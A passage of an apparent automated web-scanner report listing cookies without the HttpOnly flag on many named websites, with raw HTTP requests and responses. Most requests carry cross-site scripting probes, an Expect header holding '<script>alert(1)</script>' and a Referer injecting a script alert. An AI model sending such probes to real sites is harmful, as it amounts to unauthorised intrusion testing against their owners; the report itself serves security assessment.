The page cannot be displayed because the expectation failed.

7.142. http://www.cancercenter.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cancercenter.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

persistence=805704620.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cancercenter.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:49:11 GMT
Set-Cookie: persistence=805704620.20480.0000; path=/

7.143. http://www.capella.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capella.edu
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerwww-vc-pool=429410058.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.capella.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:57:16 GMT
Set-Cookie: BIGipServerwww-vc-pool=429410058.20480.0000; path=/

7.144. http://www.caring4cancer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.caring4cancer.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Fri, 01 Apr 2011 11:41:16 GMT; expires=Sat, 31-Mar-2012 16:41:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.caring4cancer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
CommunityServer: 4.0.30414.1743
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Fri, 01 Apr 2011 11:41:16 GMT; expires=Sat, 31-Mar-2012 16:41:16 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:41:16 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

7.145. http://www.chasefreedomnow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.chasefreedomnow.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=OVMPLYSrtvb4CKKOJ; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chasefreedomnow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=OVMPLYSrtvb4CKKOJ; path=/
Content-Length: 0
Date: Fri, 01 Apr 2011 16:51:34 GMT

7.146. http://www.cheapostay.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheapostay.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_difbqptubz.dpn=445234683660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cheapostay.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:03:56 GMT
Content-Length: 60
Set-Cookie: NSC_difbqptubz.dpn=445234683660;path=/

The page cannot be displayed because the expectation failed.

7.147. http://www.clearcontests.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clearcontests.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerPool_CCRD_PROD_EMTWEB_80=2014906634.20480.0000; expires=Fri, 01-Apr-2011 17:02:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clearcontests.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:02:13 GMT
Set-Cookie: BIGipServerPool_CCRD_PROD_EMTWEB_80=2014906634.20480.0000; expires=Fri, 01-Apr-2011 17:02:14 GMT; path=/

7.148. http://www.csi-tracking.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csi-tracking.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-a010a2c=a010a6e:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.csi-tracking.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:37:26 GMT
Content-Length: 1245
Set-Cookie: Coyote-2-a010a2c=a010a6e:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

7.149. http://www.dailydealfetcher.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailydealfetcher.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Deals_UserPreferences=Email=&MarketID=13; expires=Thu, 30-Jun-2011 16:56:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.dailydealfetcher.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: Deals_UserPreferences=Email=&MarketID=13; expires=Thu, 30-Jun-2011 16:56:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:13 GMT
Content-Length: 102195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Daily Dea
...[SNIP]...

7.150. http://www.deviceanywhere.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deviceanywhere.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-c0a80a0f=c0a81410:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.deviceanywhere.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:04:27 GMT
Set-Cookie: Coyote-2-c0a80a0f=c0a81410:0; path=/

7.151. http://www.dmvnow.com/exec/common/VitaHeader-Redesign.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/exec/common/VitaHeader-Redesign.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /exec/common/VitaHeader-Redesign.css HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

7.152. http://www.dmvnow.com/exec/common/dmvnow2.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/exec/common/dmvnow2.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /exec/common/dmvnow2.css HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: text/css
Accept-Ranges: bytes
Last-Modified: Thu, 27 Jan 2011 19:21:58 GMT
ETag: "0cf1c7757becb1:7c8"
Content-Length: 25833

* /*Set's border, padding and margin to 0 for all values*/
{
/* padding: 0; */
/* margin: 0; */
/* border: 0; */
}

body, html {
color: #000;
font-family: Arial, Verdana, Tahoma, sans-ser
...[SNIP]...

7.153. http://www.dmvnow.com/exec/common/dmvprint.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/exec/common/dmvprint.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /exec/common/dmvprint.css HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: text/css
Accept-Ranges: bytes
Last-Modified: Tue, 15 Jun 2010 16:33:34 GMT
ETag: "0434d7fa8ccb1:7c8"
Content-Length: 12780

* /*Set's border, padding and margin to 0 for all values*/
{
/* padding: 0; */
/* margin: 0; */
/* border: 0; */
}

body, html {
color: #000;
font-family: Arial, Verdana, Tahoma, sans-ser
...[SNIP]...

7.154. http://www.dmvnow.com/exec/common/textsizer.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/exec/common/textsizer.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /exec/common/textsizer.js HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Wed, 10 Jun 2009 14:51:00 GMT
ETag: "0e263dedae9c91:7c8"
Content-Length: 1332

/*------------------------------------------------------------
   Document Text Sizer- Copyright 2003 - Taewook Kang. All rights reserved.
   Coded by: Taewook Kang (txkang.REMOVETHIS@hotmail.com)
   We
...[SNIP]...

7.155. http://www.dmvnow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 17:21:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dmvnow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 17:21:10 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 17:21:09 GMT
Content-Type: image/x-icon
Accept-Ranges: bytes
Last-Modified: Tue, 05 Dec 2006 13:56:18 GMT
ETag: "0edf3227518c71:7c8"
Content-Length: 1406

..............h.......(....... ............................................................................................................wq..GF..lh..........................................QN.k ..w.
...[SNIP]...

7.156. http://www.dmvnow.com/images/aboutus_off.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/aboutus_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/aboutus_off.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Tue, 15 Jan 2002 18:52:06 GMT
ETag: "0f3abaf59dc11:7c8"
Content-Length: 355

GIF89ad......f......6).^F..p..|l
y&.......s...nR.Q=.D3..f.z\!.......,....d........I..8....`(.d((...e%....m..A...[...@%..1. j...X...x.V.@...@0$.,!. .......N..)"0..p..DUH"....t..A..LPoAq
...Ev$....(O.
...[SNIP]...

7.157. http://www.dmvnow.com/images/aboutus_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/aboutus_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/aboutus_on.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Tue, 15 Jan 2002 18:51:30 GMT
ETag: "0e5c4a4f59dc11:7c8"
Content-Length: 355

GIF89ad.........f....p.nS.7)z'......|s..m.
....^G.{\..f.D3.R=!.......,....d........I..8....`(.d((...e%....m..A...[...@%..1. j...X...x.V.@...H0$.,!. .......N..i"0..p..DUH&....t..A..LPoAq
...Ev$. ..(O.
...[SNIP]...

7.158. http://www.dmvnow.com/images/ads/11042.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/ads/11042.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ads/11042.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Mon, 23 Mar 2009 17:28:00 GMT
ETag: "09083b6dcabc91:7c8"
Content-Length: 14205

......JFIF.....d.d......Ducky.......N......Adobe.d................................................. ...............................
..
..
.........................................................d....
...[SNIP]...

7.159. http://www.dmvnow.com/images/ads/11092.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/ads/11092.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ads/11092.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Tue, 31 Mar 2009 19:10:00 GMT
ETag: "0749f4934b2c91:7c8"
Content-Length: 10054

......JFIF.....d.d......Ducky.......A......Adobe.d.........................    ....
..    ..

....
...............................

..............................................................d....
...[SNIP]...

7.160. http://www.dmvnow.com/images/ads/11134.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/ads/11134.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ads/11134.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Fri, 03 Apr 2009 16:46:00 GMT
ETag: "0545ab7bb4c91:7c8"
Content-Length: 8070

......JFIF.....d.d......Ducky.......A......Adobe.d.........................    ....
..    ..

....
...............................

..............................................................d....
...[SNIP]...

7.161. http://www.dmvnow.com/images/ads/11153.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/ads/11153.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ads/11153.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Wed, 06 Jan 2010 21:39:52 GMT
ETag: "08459c7188fca1:7c8"
Content-Length: 8913

......JFIF.....d.d......Ducky.......A......Adobe.d.........................    ....
..    ..

....
...............................

..............................................................d....
...[SNIP]...

7.162. http://www.dmvnow.com/images/ads/11190.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/ads/11190.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ads/11190.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Wed, 24 Mar 2010 12:49:00 GMT
ETag: "0c6e25f50cbca1:7c8"
Content-Length: 11195

......JFIF.....d.d......Ducky.......A......Adobe.d.........................    ....
..    ..

....
...............................

..............................................................e.F..
...[SNIP]...

7.163. http://www.dmvnow.com/images/ads/11216.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/ads/11216.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ads/11216.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
